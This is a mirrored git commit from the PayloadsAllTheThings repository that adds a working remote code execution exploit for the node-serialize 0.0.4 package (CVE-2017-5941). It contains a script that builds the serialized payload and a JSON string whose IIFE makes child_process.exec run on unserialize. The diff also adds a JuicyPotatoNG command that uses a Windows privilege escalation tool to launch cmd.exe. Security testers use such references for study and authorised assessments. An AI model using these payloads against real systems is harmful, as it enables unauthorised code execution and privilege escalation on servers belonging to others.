mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
NodeJS Serialization
This commit is contained in:
parent
7a528ccb3f
commit
72a8556dc9
5
Insecure Deserialization/Files/node-serialize.js
Normal file
5
Insecure Deserialization/Files/node-serialize.js
Normal file
@ -0,0 +1,5 @@
|
|||||||
|
var y = {
|
||||||
|
rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
|
||||||
|
}
|
||||||
|
var serialize = require('node-serialize');
|
||||||
|
console.log("Serialized: \n" + serialize.serialize(y));
|
34
Insecure Deserialization/Node.md
Normal file
34
Insecure Deserialization/Node.md
Normal file
@ -0,0 +1,34 @@
|
|||||||
|
# Node
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Exploit](#exploit)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
|
## Exploit
|
||||||
|
|
||||||
|
> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
|
||||||
|
|
||||||
|
1. Generate a serialized payload
|
||||||
|
```js
|
||||||
|
var y = {
|
||||||
|
rce : function(){
|
||||||
|
require('child_process').exec('ls /', function(error,
|
||||||
|
stdout, stderr) { console.log(stdout) });
|
||||||
|
},
|
||||||
|
}
|
||||||
|
var serialize = require('node-serialize');
|
||||||
|
console.log("Serialized: \n" + serialize.serialize(y));
|
||||||
|
```
|
||||||
|
2. Add bracket `()` to force the execution
|
||||||
|
```js
|
||||||
|
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
|
||||||
|
```
|
||||||
|
3. Send the payload
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
|
||||||
|
* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/)
|
||||||
|
* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
|
@ -1289,6 +1289,14 @@ C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
|
|||||||
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
|
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### JuicyPotatoNG
|
||||||
|
|
||||||
|
* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## EoP - Privileged File Write
|
## EoP - Privileged File Write
|
||||||
|
|
||||||
@ -1505,4 +1513,5 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
|||||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||||
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
||||||
* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
|
* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
|
||||||
* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/)
|
* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/)
|
||||||
|
* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/)
|
Loading…
Reference in New Issue
Block a user